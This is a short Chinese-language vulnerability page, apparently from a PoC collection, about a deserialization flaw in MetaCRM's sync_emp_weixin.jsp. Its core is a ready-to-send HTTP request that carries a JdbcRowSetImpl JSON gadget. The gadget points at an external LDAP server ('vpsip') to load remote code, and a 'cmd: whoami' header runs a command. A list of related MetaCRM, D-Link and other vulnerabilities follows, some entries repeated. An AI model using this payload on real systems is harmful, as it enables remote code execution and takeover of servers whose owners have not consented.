MetaCRM sync_emp_weixin 反序列化漏洞

漏洞描述

反序列化漏洞主要发生在应用程序未对用户输入的序列化字符串进行充分检查的情况下，攻击者可以通过构造恶意的序列化数据来进行攻击，从而控制应用程序的行为，执行任意代码，访问或修改敏感数据，甚至可能导致整个系统的控制权被攻陷。

PoC代码

GET /weixin/admin/sync_emp_weixin.jsp?emp_json=[{%22@type%22:%22[com.sun.rowset.JdbcRowSetImpl%22[{,%22dataSourceName%22:%22ldap://vpsip%22,%22autoCommit%22:true}] HTTP/1.1
Host: 
cmd: whoami

漏洞描述

PoC代码

相关漏洞推荐

metacrm-download-new-fileread: MetaCRM美特crm系统download-new.jsp接口存在任意文件读取漏洞 POC

MetaCRM存在任意文件上传漏洞 无POC

MetaCRM 客户关系管理系统 headimgsave SQL注入漏洞 无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

D-Link DIR-645 命令注入漏洞 无POC

MetaCRM存在任意文件上传漏洞无POC

MetaCRM 客户关系管理系统 headimgsave SQL注入漏洞无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞无POC

D-Link DIR-645 命令注入漏洞无POC